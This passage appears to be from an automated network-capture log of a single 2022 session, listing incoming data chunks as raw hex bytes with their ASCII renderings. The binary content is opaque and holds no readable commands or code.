                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29240INData Raw: e1 70 97 61 86 4e 4f ff b4 fa 10 ae 90 7a 27 22 05 e5 0c db 48 e2 96 b4 a0 8f fd 54 91 ac 6c 18 6d af 3d d2 f3 df ae 7f 2f 74 47 be e3 08 6e 8e 31 0e 05 4b e2 e6 38 00 4f c5 7c 49 2b 89 8f d2 79 99 54 af f2 e1 52 c8 96 cd cd 74 8d 85 55 d9 d3 01 e3 99 a6 37 22 b2 e5 76 6f 58 9a 41 02 c8 9b 16 0e 81 e4 78 30 94 e3 e5 f6 ad 42 78 99 bb 3d 03 11 17 00 e1 d8 8c b4 1d 8c b6 b9 7f 21 51 12 84 6f f6 34 d4 55 30 23 33 3e db d8 fc 33 56 0a 4b 1a a3 cc 8d 45 eb cb 11 e3 ed 5a c9 34 d1 b5 0f dd e6 aa 24 5b 8b 4c f8 74 cc a4 ad b4 4e c5 17 b9 5e 97 31 d9 42 76 6a a7 36 d0 0d 99 f1 e4 5c 89 93 a7 0f ef 4e 83 5b b5 f1 7e 70 16 7c 2e 85 01 0e d7 3e 4f 9c 19 94 30 0e 34 d6 46 d5 f1 01 2e 85 ed 55 a3 a5 89 6a 41 bb 35 cc 41 3c b5 7c a9 94 ef 40 d9 d3 08 06 a4 55 0b 52 c5
                                                                                                                                                                                                                                    Data Ascii: paNOz'"HTlm=/tGn1K8O|I+yTRtU7"voXAx0Bx=!Qo4U0#3>3VKEZ4$[LtN^1Bvj6\N[~p|.>O04F.UjA5A<|@UR
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29256INData Raw: 0b c2 17 b4 eb ad 3f e4 5f 5d 12 6d 19 3c 11 71 12 66 c5 ab 3f 27 8c 9e a7 15 ae a7 8f da a4 88 47 28 55 41 7d 74 5f b0 43 e0 bc 02 72 a2 ef 20 f6 36 37 0c 0b 5f bb 2b 83 5e 96 d5 3c 1c 08 67 dc c2 32 93 1c 23 4a 3a 24 20 23 15 e6 c2 0f 00 51 ec 99 23 e4 b2 48 9d 90 3a f9 7c 1c c9 0e 8f 86 ab d6 5d 03 a8 ea 0f 40 2f a9 c9 2e 83 5f 0e bb 69 59 86 6e 36 f1 ba 68 f0 bf c5 21 4d a3 d0 04 87 76 8a d5 18 d3 b7 2f 30 af d2 d8 e8 eb 38 b5 15 2f c7 55 f6 cd 19 92 a5 d8 f8 05 8f 66 86 fa 42 e6 c5 f4 e1 88 8d 5a 7f f4 0c e0 0b 43 3a 00 89 6e 0b 99 e7 7e 42 0b 45 db 4a fd 56 b4 e5 6b 13 fe fa 3b 13 35 23 44 33 db e2 b1 79 16 a5 8d 4f 45 0c ea 88 00 99 e9 e1 7d ea 9f fc 48 c6 e4 4d 69 cf a2 8e 08 24 9c 33 e1 79 9c 5a e6 af f4 d7 eb bd 8d 69 da 2f 6c 49 c6 b0 ce b0 64
                                                                                                                                                                                                                                    Data Ascii: ?_]m<qf?'G(UA}t_Cr 67_+^<g2#J:$ #Q#H:|]@/._iYn6h!Mv/08/UfBZC:n~BEJVk;5#D3yOE}HMi$3yZi/lId
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29272INData Raw: ea 2c 6c d9 b8 fb 1b a4 01 81 e7 7a 4a 2c fe f0 9c 0f 55 b8 3d 33 59 9c b0 39 8b 74 fc ae 2b ac 9d 58 8d 85 df db 5a a8 0c 8f 84 f4 b1 a1 f4 e0 76 ef 3a 96 00 5c e3 30 f2 83 ef 1e c4 e2 c8 76 6b 1e 35 3d 32 d9 4e d2 49 5b 7c 91 47 0e f6 25 44 08 38 95 3d 23 c5 3c 1e 06 1d 59 d8 2f 91 49 35 83 4b 3b 70 2f dd a1 f5 77 f6 28 a6 f1 5c 51 4a db 1e 83 1b a4 b1 7d b8 f2 7b 93 6e 87 17 63 1e 60 c1 6a 8f 94 27 9b 29 93 58 75 f5 e3 86 03 63 d5 39 df 4a 32 c3 4d 79 1f b5 77 6a a1 a9 7d 48 19 89 aa 18 36 49 47 ad ea 65 0c f4 dd a2 b2 73 83 bb 19 0c 76 75 f8 3c 19 e6 24 04 99 9b 57 31 94 28 2e c0 eb b3 36 81 2c 08 ea 6e af 7a 6b f1 e8 5e 20 4b b9 dd 1b d9 8f cf cd f3 00 a0 b3 eb e4 38 ef 3f d3 ed 3a a0 7a 46 c8 12 be 9e 54 b5 6f 7f 3a cc be 80 6d 05 0b aa 00 f7 7a f0
                                                                                                                                                                                                                                    Data Ascii: ,lzJ,U=3Y9t+XZv:\0vk5=2NI[|G%D8=#<Y/I5K;p/w(\QJ}{nc`j')Xuc9J2Mywj}H6IGesvu<$W1(.6,nzk^ K8?:zFTo:mz
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29288INData Raw: 76 95 81 97 c8 0e a5 1c c8 70 87 40 49 8b 18 4e 55 1a c1 a3 dd 96 7f 03 35 ea 3b 33 5e 81 11 35 5c 42 78 df 1e 43 b3 2f 53 0a 65 69 84 e1 45 ef 24 fd d8 5d ca ee 9e e9 40 59 28 40 cd d5 20 15 4f 58 2a c3 9e d2 21 2f 00 f5 88 5f bc 12 2d 04 a9 f4 0e 2a c4 f3 ca 12 7d da 6f 5d ea 1a ba 7e 9f d9 d5 06 22 39 ff 5d 19 99 55 e0 36 09 44 db 47 8e f7 2e c1 18 7f 11 36 13 33 f5 65 10 98 53 cc 78 60 bf 1b 72 f5 8b 62 cd fd a4 fa ee f6 19 1a 75 bf eb 19 dc 3a 99 3e 3b 31 bb e7 83 71 51 8f a2 d1 a2 65 fd 28 3f eb 80 65 42 c9 87 59 51 24 db 71 7c 12 ad c8 29 d4 26 26 5c 4f 14 11 c7 e3 fe 7d 44 f3 49 3d 51 66 25 0f d6 51 3b 8f cc b8 c6 1c 69 36 c4 2a 44 c5 4c 6e 16 ce 51 d1 52 85 2d 04 28 d6 8c 50 91 65 7a 5a c7 84 48 a3 bd 5b 60 18 a1 ba e3 c9 8f 82 fd 12 4c 64 fc c7
                                                                                                                                                                                                                                    Data Ascii: vp@INU5;3^5\BxC/SeiE$]@Y(@ OX*!/_-*}o]~"9]U6DG.63eSx`rbu:>;1qQe(?eBYQ$q|)&&\O}DI=Qf%Q;i6*DLnQR-(PezZH[`Ld
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29304INData Raw: 5b eb 01 5f 7f fb 3c 22 e5 50 b2 d3 37 12 6c 8b f0 79 d9 29 8c 62 f8 40 97 15 77 87 6a 62 b6 de cb 67 f6 cf f4 a3 38 42 fc dc d5 5a b0 6b db 63 86 5e 60 58 ea 29 1d 9e b5 9f 9a 44 42 c0 de 21 26 38 54 01 f2 f8 85 b7 77 b7 d4 da 87 3b 3d 8b 3f bc 64 cb 36 01 d2 36 64 f6 12 30 5c b7 b2 8f 00 ef 53 83 43 09 2a fd b6 fc 61 2b 64 66 4d e9 21 b0 ef e7 0d 2a c6 10 35 64 14 da f3 cf 1d a5 8a fe fb f6 b1 ab 6e c3 2d 84 36 64 2b a8 d3 51 d3 20 c0 d3 de d4 cf 46 5a 1f a6 6d 13 77 69 20 aa 65 9c f7 6a 4e 62 a7 e1 eb 21 2a 59 c9 85 8d d8 79 d8 df 25 ca 09 4b a7 d1 a6 ed 0e f8 ce c3 3d 67 55 42 cd 2f 86 63 35 c3 f6 5f fb cf 8d 44 11 ff 22 11 da 8e e6 bf 15 8b 82 22 d8 dd de b7 62 45 bb 1c 6f 8e 36 95 92 44 0f 9f 28 01 a7 7a f9 aa f0 0b 9a 73 e1 eb a1 3e ff 7f 5a 14 c3
                                                                                                                                                                                                                                    Data Ascii: [_<"P7ly)b@wjbg8BZkc^`X)DB!&8Tw;=?d66d0\SC*a+dfM!*5dn-6d+Q FZmwi ejNb!*Yy%K=gUB/c5_D""bEo6D(zs>Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29320INData Raw: 70 a8 19 47 c0 ec 2a 3c 2d 7b 44 16 30 5e 12 d8 c1 11 e4 06 41 35 1f 24 82 e9 ec 60 be 07 fa 56 fa 80 70 5d 3f 10 86 5e 10 54 33 4c 82 74 95 62 10 c4 3b d3 3d fa 69 b4 b6 d6 08 9a fe 5b 87 e7 da 4f 9e cf 78 f4 07 ad 1f 44 2f 4d f7 e6 a2 f6 9d 16 59 b2 2c d9 0d a1 4e 66 cb 99 de e3 c7 8c cf 1f 13 20 70 fa 20 79 d2 14 03 49 5b b1 b7 d3 39 68 2a ab 28 8e f5 14 d4 1c 32 7a db d4 43 83 c4 0d 58 fe 8b e4 39 d2 81 0a 44 16 b5 85 bb aa 5e ea 3c 7b e1 04 d2 77 80 de 49 27 e5 73 09 4a 97 ce d4 9b 18 a4 24 00 63 1d 1b d5 9f 79 6c 0e 75 86 f4 76 36 74 2b 51 e2 05 1b 90 96 06 b5 3e 81 e0 c8 a4 a0 a5 bf 24 87 94 f0 5f 99 2d a0 1d 46 19 5e 85 a5 7d 01 55 fa 99 1d 67 88 d5 2d 16 c2 70 4b cd 89 ed 61 86 04 6d 0e 26 a3 87 b3 d1 fc 11 43 d3 f9 30 ab dc 0c f1 10 34 86 f5 b8
                                                                                                                                                                                                                                    Data Ascii: pG*<-{D0^A5$`Vp]?^T3Ltb;=i[OxD/MY,Nf p yI[9h*(2zCX9D^<{wI'sJ$cyluv6t+Q>$_-F^}Ug-pKam&C04
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29336INData Raw: ec e6 bf ec d2 22 5b 6d 55 f4 55 2f e5 0d 69 9a 6f 26 9c 25 9e 0a 23 ae 63 2f ae a2 88 4b 9f 73 d3 81 d8 99 6b 52 c0 e3 b2 8e c7 d1 7d 61 e6 91 f4 3e cb 46 58 d5 68 4f d0 5c dc 51 01 c3 7e fd da 7c d9 e7 74 28 a0 05 62 6b 87 bf 97 bd 26 d2 a5 6f 0e 53 bb 6f e8 3c fa 62 03 f7 8a 5f 9d ef 0c 37 f8 13 7d 90 8d c8 af 19 16 81 c3 c5 16 10 9e 47 fb d3 5a 61 d8 c2 7b a1 dc cf 71 59 ae 51 72 30 78 33 17 0e 4c c3 f4 c4 82 de 83 a1 d6 1d 65 a8 87 86 d3 94 e5 d9 d4 a2 9e d6 aa 57 25 d8 48 0b 7f 66 06 79 22 b2 65 d5 ab 33 d9 30 aa b7 06 f6 ff f5 5a 18 61 ea 62 e2 a8 55 47 23 c8 d8 9e 4f 69 04 55 b4 d4 47 5c c3 b3 56 c4 3e 2f 6f f7 fa 84 a2 2b 9d af 12 ac 48 02 f6 0a 1f 0f b8 5d 70 f3 6e 3c b5 34 f8 46 ce 1a 80 8f f6 98 14 00 d6 54 6d 12 a8 0e 5d 71 0a e0 c9 90 46 82
                                                                                                                                                                                                                                    Data Ascii: "[mUU/io&%#c/KskR}a>FXhO\Q~|t(bk&oSo<b_7}GZa{qYQr0x3LeW%Hfy"e30ZabUG#OiUG\V>/o+H]pn<4FTm]qF
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29352INData Raw: 1b 6c 8b 0b f5 3c 36 80 cd bc 49 21 49 9c a6 5b c8 f3 67 66 1a 6d 5e 20 b3 9d 87 1b a0 fe 3c cf 87 61 df b2 21 3e 44 40 5e e0 e7 8c cd 49 56 3e 23 c4 f5 3a d4 9b 32 6f 85 b3 54 ba 85 c8 cd 9e de 8a 45 e8 4e d7 87 8f 1a 4e 3e 9e 4a d2 e3 af 4e 65 d4 1c b3 6d c1 38 0f 67 60 93 a7 f7 df 60 ce f7 43 ad d7 e2 ca 39 a0 58 d4 62 e6 22 0c bb cc 34 ff c1 c0 e1 6d 20 ba 95 11 10 a1 fd bc 12 b6 56 92 cc ef 85 6b 07 14 8c 82 3e 42 4b 4e 55 61 0f 56 58 c7 2e dc 7b db 53 ed 82 34 22 a7 9a 7e 80 2a f3 fc f6 0a 9b 31 cd 7a eb ad e3 28 a9 0b 17 55 8c 95 09 29 7d 7e a6 47 41 3a 64 65 25 d7 4c 93 2a ce 11 12 8e 2c 95 e5 64 ee 84 bf 46 b8 b3 40 16 35 d4 3c b4 1f 47 6f 16 26 d0 a0 ad 6a 09 5d 09 5a f6 7f d0 52 d9 0f ff 93 7b 6d 6c 0d 90 7b 6e bb 11 e4 de f0 9e 53 ac 9e 36 56
                                                                                                                                                                                                                                    Data Ascii: l<6I!I[gfm^ <a!>D@^IV>#:2oTENN>JNem8g``C9Xb"4m Vk>BKNUaVX.{S4"~*1z(U)}~GA:de%L*,dF@5<Go&j]ZR{ml{nS6V
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29368INData Raw: 4b 66 11 6a 2b 32 ed 4a 3c 5e 90 b1 4d 8b a9 3d ff bb 99 d6 c9 cf 21 57 f5 2f 4b 2d e2 e1 51 8f e1 6a 7a 2f f7 59 40 e8 2f d0 8c ba 93 3a 42 11 23 bf 78 39 80 fb 79 77 80 c0 7f fe d1 af d4 c4 4e 32 41 6e 96 e1 34 58 6c 58 28 57 18 40 7c 81 f7 4b 06 08 03 79 b9 9f 3c a0 0a 6d 4e 42 1c 9f ad 15 34 46 2e 57 b2 02 ce fc 21 5a b7 17 5e 01 e3 f6 7e f8 a1 10 25 9f c6 6c f0 2c e9 04 f1 7c 0b 4c 13 cb 53 e7 4d 3f eb 53 0c 4e 74 a7 d8 5c 42 d5 86 fe 45 01 da 1f 32 a3 53 6e 59 ed 82 2c 7d 16 27 ad 18 2f 79 2d 03 5a 30 ce 94 8c a4 09 6d c6 fe 6c a0 2b 5b 57 cf 19 4e 39 fc 17 7e ad 53 8e 4c c1 ea 45 80 af 9e ec 18 e6 d2 1c 43 8d 85 90 cf 9a 61 45 60 56 09 28 87 0c 7a 27 c7 da b0 03 85 b7 2e 66 51 22 c0 70 0b 12 c0 2d b8 fd b7 a1 ab aa 4f d7 1c fd 8b 94 d3 ee b7 55 27
                                                                                                                                                                                                                                    Data Ascii: Kfj+2J<^M=!W/K-Qjz/Y@/:B#x9ywN2An4XlX(W@|Ky<mNB4F.W!Z^~%l,|LSM?SNt\BE2SnY,}'/y-Z0ml+[WN9~SLECaE`V(z'.fQ"p-OU'
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29384INData Raw: b8 84 b3 f1 19 93 d6 9f 6a ec e3 d6 d5 79 eb 2f bd 0d 54 90 c3 32 09 6b 8b 52 ed 32 c9 86 e8 95 b8 4f 9c 7d 08 b6 af 5e 76 87 83 e6 b6 02 ab 2a d4 c0 45 7a 69 de 91 fa 1e a0 89 be 8a 11 3b 5e 61 24 2d d4 11 36 f4 fc ed 67 4c cd be 19 b2 0e 1d f5 22 58 89 5e 16 83 f0 b4 f5 e1 d9 07 c0 0c 55 8b 8d 6e c9 67 0c 0c 5e ef b7 21 4f d1 e3 87 c6 44 52 1f f2 6b 70 7a f5 87 3c 88 d6 41 be fa fd 0a 90 d7 12 f8 ac ad f6 63 5f ed 01 30 dd 35 bc 34 fc 2a 04 06 e5 11 0a f5 35 21 15 91 9d 3d 8a 35 40 84 7a e2 d1 3a 1c 02 b9 a9 77 eb ec 6a 87 da c6 3e e7 0d 31 b1 f7 b7 ce bc bb e5 7d 9f e0 0d bd 5e e2 76 59 4e 20 10 e8 26 e8 19 93 fc 12 ca 21 c4 67 95 a2 80 30 4b 44 dc 31 36 b6 22 17 14 0c 27 a9 42 64 77 d2 9c 98 5f 75 22 8f a3 24 a2 f5 1a cf c4 f8 69 c3 29 41 ca 92 19 c0
                                                                                                                                                                                                                                    Data Ascii: jy/T2kR2O}^v*Ezi;^a$-6gL"X^Ung^!ODRkpz<Ac_054*5!=5@z:wj>1}^vYN &!g0KD16"'Bdw_u"$i)A
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29400INData Raw: e9 71 10 4e 65 c0 c8 cf 72 85 67 e6 74 d1 2c 10 00 0a 28 62 58 e1 19 ac eb 76 5e a2 a7 7c 40 d2 92 21 ec 55 3d 8c d2 67 89 fb 3e 77 73 dd af e6 e6 5d 24 ec 75 85 ff 6c ac e4 fa 42 f7 5a 87 3e 77 ea 7d 2b e7 a1 60 87 7f b7 b0 22 82 ec ac dc 49 07 8a ab ec 2e b8 dd ea 6c 5d 9d ee 42 c3 3b b0 bc 05 b5 9f a2 8e 80 07 07 3c 44 a2 cd 6f b9 3d 3c 0d 70 8f cc 2a 13 4f 7a 4f be 1c c8 92 ad 90 1a c6 06 7b ca 94 d3 24 23 27 d6 1a 15 36 c1 08 ea 70 ca 8a e4 7a 2f 03 9e 31 f1 e1 22 31 fe 24 c7 d0 e1 39 3f 38 c7 66 82 d8 ff 07 d8 82 c3 27 85 7d 6c 04 03 2d 33 0c 64 7c 0e b3 b6 a2 a6 f9 e4 f0 09 76 19 c8 e9 15 c2 31 54 92 08 4c b1 22 5c af 51 b4 e1 19 32 4d 91 4c 65 ab 1b e8 49 a0 30 fd 91 ab 43 59 c8 bf ed f2 9c 93 18 91 36 fa 3e c0 20 21 23 4d db fe 5f e4 3c 14 56 08
                                                                                                                                                                                                                                    Data Ascii: qNergt,(bXv^|@!U=g>ws]$ulBZ>w}+`"I.l]B;<Do=<p*OzO{$#'6pz/1"1$9?8f'}l-3d|v1TL"\Q2MLeI0CY6> !#M_<V
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29416INData Raw: e1 1f 2a 58 3e 4e 57 d4 1d 3b 40 56 6a 43 94 d7 01 f3 f8 1d 12 63 5a 04 2e 16 12 b6 53 f5 b3 bf c8 61 5a 4a 9b d9 a2 c5 98 28 dc 2b ed 9f 54 83 8d 20 a1 b4 fd 5b 4e 84 38 dd c2 e7 de ec 9f 40 01 f6 f8 f6 60 a7 6c 97 8f 04 09 59 a4 72 5c d7 ca 07 e6 e7 41 62 85 ce 51 cb 98 e7 54 71 c9 ff 1c 2d f2 98 66 df 40 d4 fa d6 f7 7f 18 9f be 68 f6 6e e4 e3 47 b6 61 4d 6a 00 87 a3 7a fb 66 7e 18 01 45 38 5e 2b 66 31 0b d1 37 80 54 1a 13 1b 65 b6 3e 14 ac 76 b6 e2 c7 37 92 c4 14 1e 5a b6 24 0d 4c 8f 1e 10 86 62 af 7b 5e d6 44 c2 4f ce dd 69 f5 8e 9e 7f ee bd fe 13 b1 61 53 05 f9 18 da 5b 8b af 0b 33 73 da c4 52 57 79 2a 46 a2 eb 0f 39 70 51 31 36 57 f0 17 29 25 ed ec 3a a2 b1 0a 25 5d b8 ee 70 c6 de 2e 2c 61 ff cc 06 82 a3 f4 fd 58 31 dd 4c b5 c9 6d f7 1d e7 5a 84 11
                                                                                                                                                                                                                                    Data Ascii: *X>NW;@VjCcZ.SaZJ(+T [N8@`lYr\AbQTq-f@hnGaMjzf~E8^+f17Te>v7Z$Lb{^DOiaS[3sRWy*F9pQ16W)%:%]p.,aX1LmZ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29432INData Raw: 4d 04 cc 65 54 b5 5e ed 0e b8 1b 12 31 b8 de c5 7c 2f 74 07 83 91 bb c7 d1 93 a8 0c eb 23 e7 16 0b 8e 86 78 0a 26 3c 08 4d 80 fc 51 ac 56 ac 4b 85 d8 29 82 52 c1 7d 6d bc 85 5d 52 b0 0d ea 52 c6 74 16 7f 76 6c a5 ac fc 67 42 d1 c7 dc 93 84 ee e2 d6 ae 75 4b 52 65 d8 84 ae 0f 36 60 09 0e b7 08 65 18 df d4 8c c1 ee c6 f4 68 e4 95 58 b4 14 59 8c 7a e3 5c 3d 69 c0 bd 38 03 cb ef 09 4e 58 44 31 a4 94 2f 88 ad d2 e3 ef 4b 86 34 56 f3 2b ee a5 ca 29 ec 43 63 43 32 f5 a0 82 95 cb 23 97 e3 5b 55 b3 12 90 b4 b4 89 b6 6d 57 37 f8 58 01 73 f7 39 84 58 12 d0 a7 2b 2c 2c b3 91 a2 fc db 00 67 1b 05 f2 4b 1a c3 bf 0e 60 b1 6e 58 bb ed 5f 2b 5e b7 e5 b0 a6 22 6f bc ec f2 75 96 dc 15 e6 07 64 a0 8a 65 02 a7 a3 ca bb 6e 3c e7 7f 07 4e a8 4d 4b 76 94 0b 6f 52 3e a3 39 0a 14
                                                                                                                                                                                                                                    Data Ascii: MeT^1|/t#x&<MQVK)R}m]RRtvlgBuKRe6`ehXYz\=i8NXD1/K4V+)CcC2#[UmW7Xs9X+,,gK`nX_+^"ouden<NMKvoR>9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29448INData Raw: f0 89 a4 bc 0c 07 36 0d ec 2f 22 a8 57 8a c4 af f2 81 b4 03 da f2 2f 88 1b d9 f2 2f 48 a4 4c b8 d4 3a 57 b3 21 fb 7a 2d 07 d4 c3 49 93 d9 ff 81 d6 d2 c8 cc 97 eb a0 3f 94 d2 fc 89 58 46 ce aa af 06 58 74 68 45 89 68 6e 87 3a 89 88 47 44 83 45 e1 be ad 5e a8 0f f5 cc dd a7 5b 25 05 2d 3b 07 a5 0f cd b1 94 d7 11 f0 e6 2f 2a 9b 81 c0 d0 f4 61 1b 92 4d 4c 4a 0f ac 19 a6 39 da ca f2 f9 21 bd 75 d4 c3 a2 2a 0b f3 51 4f 1a aa 8f 51 f6 25 90 e6 37 55 9f 4b 37 1e 3f ed 90 be 79 15 4a c2 54 63 3f 79 c1 03 b3 2a 2e 3b ac 1b d2 67 b1 92 83 8d 26 9d 39 ef cd 3d f1 8c 40 74 60 b7 72 dc be c1 ea 5d 01 b8 eb 60 26 3c af 1b 98 2b 27 d1 e9 d6 2e 23 7c cf 63 7b e9 ad b6 ef e3 c4 a8 63 df 61 7b 2c 0b a4 19 96 98 e5 95 99 c1 20 cf b0 d4 1c e5 0a e6 b0 a9 b4 c4 f1 37 68 69 d1
                                                                                                                                                                                                                                    Data Ascii: 6/"W//HL:W!z-I?XFXthEhn:GDE^[%-;/*aMLJ9!u*QOQ%7UK7?yJTc?y*.;g&9=@t`r]`&<+'.#|c{ca{, 7hi
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29464INData Raw: fe a0 17 ce 63 53 f1 bf ec e2 43 49 98 15 a6 3f d0 e1 86 58 20 9e 7f fb 5d 18 e0 99 93 ff 12 51 5c e5 41 37 44 40 6b db aa 3d 18 fe b2 12 4a a2 55 81 fb ea 6e 53 f8 23 50 ae 54 48 38 7a 5b 5b 79 26 44 d3 19 66 03 39 25 eb 2d fc ef f3 27 f8 f8 91 69 47 9a f5 6c 11 ab 5a 62 28 f7 17 6b d5 04 3e fe 62 2f 80 3d d1 2d 25 64 5c dc a7 d0 84 7a a9 e6 35 b2 64 e7 db 2b 35 a6 39 6f 60 90 33 91 ff f4 4d 62 35 6c ac be a9 74 45 ed 3e 60 89 be d4 e6 b8 70 e9 cc 4a 7d 23 c0 7c a0 46 20 70 15 b4 90 bc 3a cb 4e c7 46 13 17 bd 9b e4 4f e6 cb c3 88 e7 87 32 0a 70 e0 65 e8 d4 5b 18 52 d8 bc d4 b9 73 0c e4 d7 80 15 a7 d5 59 f5 2d 36 63 9f ce f3 5e 31 06 b2 fe 9d 53 2a 60 62 0f a1 e0 3a 33 03 ad 73 8a 05 03 c2 59 28 37 2b 63 55 42 41 19 3b da f9 7a ae 66 ef 07 08 84 11 e5 54
                                                                                                                                                                                                                                    Data Ascii: cSCI?X ]Q\A7D@k=JUnS#PTH8z[[y&Df9%-'iGlZb(k>b/=-%d\z5d+59o`3Mb5ltE>`pJ}#|F p:NFO2pe[RsY-6c^1S*`b:3sY(7+cUBA;zfT
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29480INData Raw: f9 20 dc f9 2b f2 f5 c2 10 54 af 6e fd 10 60 73 45 e2 32 81 68 4a 4e 75 a2 89 db ca 6d cb b1 75 fc 4b 4d 04 84 18 a1 b1 cc 33 73 e3 e1 63 a1 cc 3a 36 33 8d 00 39 14 01 7a 1f a9 2e 68 72 a5 93 ff c3 3d 9f b9 ff 2a c5 1c c9 75 b0 de 97 cb 08 29 c1 69 23 5d b0 bf ac cf 80 47 3a 8b ea 27 d1 c4 6e 6e 7a 9a c3 be 54 a2 c1 9b bd 0d db 8c 1d 73 6d 2f f7 e8 c8 ee 83 02 67 09 41 25 85 84 f7 6f 00 e1 54 2f bf c3 a8 2b 68 a7 22 4a d7 d7 a3 dd 0d 5c 15 6f c9 5a 5a b1 66 b1 44 42 86 75 17 e7 11 0b b3 c1 72 2f b6 96 6a 16 7e e1 91 54 18 cc b6 73 9b eb c4 94 cf 9a c8 14 79 ee f0 86 06 a7 e1 85 8a 55 b9 82 62 b9 5f 5e 69 90 10 71 30 f2 68 ff ba fc b6 c5 43 f6 f0 1d a1 4c 8d fd 5d c7 c5 b2 ae f4 79 3f d8 96 a5 27 31 87 28 03 02 63 ce ab 79 31 51 18 0b 0b 80 87 0e 80 ad ca
                                                                                                                                                                                                                                    Data Ascii: +Tn`sE2hJNumuKM3sc:639z.hr=*u)i#]G:'nnzTsm/gA%oT/+h"J\oZZfDBur/j~TsyUb_^iq0hCL]y?'1(cy1Q
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29496INData Raw: f1 3f b3 0b 47 c5 70 1a fe 2f 7f 0d 7a ed 72 c8 74 9c e2 35 26 28 55 c7 8a 11 b9 64 69 07 6e f9 6f 8d f5 ba 76 92 c3 2b df 7b ab f2 8c cd 91 64 11 2d b9 79 e5 8e 0c 40 d6 b3 bb 00 55 4b d0 e5 c6 cd 5e cb e6 fc 61 00 66 87 ef d5 39 ea c7 34 da bc 61 0b 26 0b 8c f2 02 4f ea 60 cf e0 9e 5d 81 3b 1a f9 8d a2 8d 0b 34 d6 1b 5c 8c 93 3e ad 47 28 68 3b 94 5b 7a f6 f2 92 20 d4 88 33 d9 d0 53 e5 cb a1 85 02 58 f3 b9 92 44 6c c6 b3 dd eb ee 67 b4 f3 5c 93 f0 33 b2 a8 32 cd e6 1a d9 ee ec c1 c3 45 9b d4 ab 5a 4f 1b 0a a6 45 14 82 9f 14 b0 4d 6b 80 38 d7 95 fb 12 cc 75 72 bd 54 32 1c e2 5b ba d0 51 7d cf b6 7e 5f 53 15 5d 90 43 01 ed d6 c6 95 b4 ea 92 52 2f a9 44 58 88 7c bd bb 51 f9 b8 b5 9e f2 14 88 6a bc 47 ad 12 79 54 52 5f a5 17 09 43 be de 6b 0e 11 2f 6a 66 c2
                                                                                                                                                                                                                                    Data Ascii: ?Gp/zrt5&(Udinov+{d-y@UK^af94a&O`];4\>G(h;[z 3SXDlg\32EZOEMk8urT2[Q}~_S]CR/DX|QjGyTR_Ck/jf
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29512INData Raw: e4 15 a2 ae a9 30 c8 df 89 55 ed dd fe b9 bb 23 40 87 c6 34 4e a9 c7 f0 ed 22 cd a0 56 d6 ad 09 e8 23 b4 e5 1f 2b 60 af 24 d1 4e 0b f9 ae f8 59 3e 19 38 e2 26 2c 33 45 25 36 51 d4 76 08 b9 ad 06 40 6c 6b d2 b2 b1 50 aa a7 12 5c 5d 84 dd 0d 62 7d bb 63 cd 1e 39 3a 8e 71 ff 74 38 68 80 c5 1d c7 ac 84 1d 82 7b 5e 2c e7 2f e7 3d 77 dd 2a 77 92 c0 dd bd 97 fb c6 f5 7f d0 20 ae 76 fa b7 d4 5b 40 06 da ca 90 dd d4 6f 4b 70 69 22 ac 1c 15 ff 7c 5d 25 49 d2 62 eb 3e 14 d7 46 8e f9 04 ac 7a 19 da 5a 0c 5b 77 b5 ad 0a 66 fb a5 c1 cc cb 39 9f 1d 43 11 09 f3 62 b8 e3 83 91 aa 3a a0 48 fe 3e 7c bd d4 7f a6 3a 26 fb 47 bc 91 94 44 5d 66 d8 72 94 19 ed 96 c8 fb 0b 8d 15 64 ef ff 7d f8 a5 32 41 3f cf 69 0d ea 0e 26 63 96 64 22 0e 95 b8 f5 85 59 b1 56 50 af 14 bb 55 b0 a4
                                                                                                                                                                                                                                    Data Ascii: 0U#@4N"V#+`$NY>8&,3E%6Qv@lkP\]b}c9:qt8h{^,/=w*w v[@oKpi"|]%Ib>FzZ[wf9Cb:H>|:&GD]frd}2A?i&cd"YVPU
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29528INData Raw: bb fd 73 f0 0b e9 c0 a2 53 5b 2e 69 84 e8 4c 4b cf 6c 1a e4 db 16 61 27 be 0a d6 41 2e bc c8 90 67 a1 17 7e 64 30 70 3b f7 0c 7f 96 65 cf 83 93 aa ea b8 39 11 41 e5 44 a4 fa f7 bf 9b 35 e2 16 e6 4d 48 58 9e 6a ef 93 84 e7 1d 50 b2 c8 ba eb 40 68 77 3c 32 12 15 03 3e e0 9a fe 57 c8 17 85 7d 64 1d fe 09 e3 2b 9e a7 e2 d0 dd cf 15 36 7c ae 55 28 8a e9 97 93 d1 e7 72 2f f9 4c ad 64 62 ba ce 54 7b 7d dc 33 17 b6 7c 96 29 93 d6 2d 5b c3 68 36 fb 7b 80 11 bf b0 ab 5f c5 ea 28 2d bd 13 0a 1c f5 be 0b 76 9f 56 b5 08 f4 99 51 2e 13 b5 93 1f 0c b1 b7 79 40 89 9a 2a b9 ac 28 a1 71 ab 17 f0 db 26 69 14 be 3b 52 b6 d2 a8 33 a1 4c 81 0b 46 75 df f1 d7 18 39 0f 74 0a e9 42 39 21 e4 99 b5 1a 1f 43 65 db 37 b2 37 1d 9c 50 e7 2d 06 34 ed d1 de 53 6e 75 0a 7b 38 b8 28 dc 65
                                                                                                                                                                                                                                    Data Ascii: sS[.iLKla'A.g~d0p;e9AD5MHXjP@hw<2>W}d+6|U(r/LdbT{}3|)-[h6{_(-vVQ.y@*(q&i;R3LFu9tB9!Ce77P-4Snu{8(e
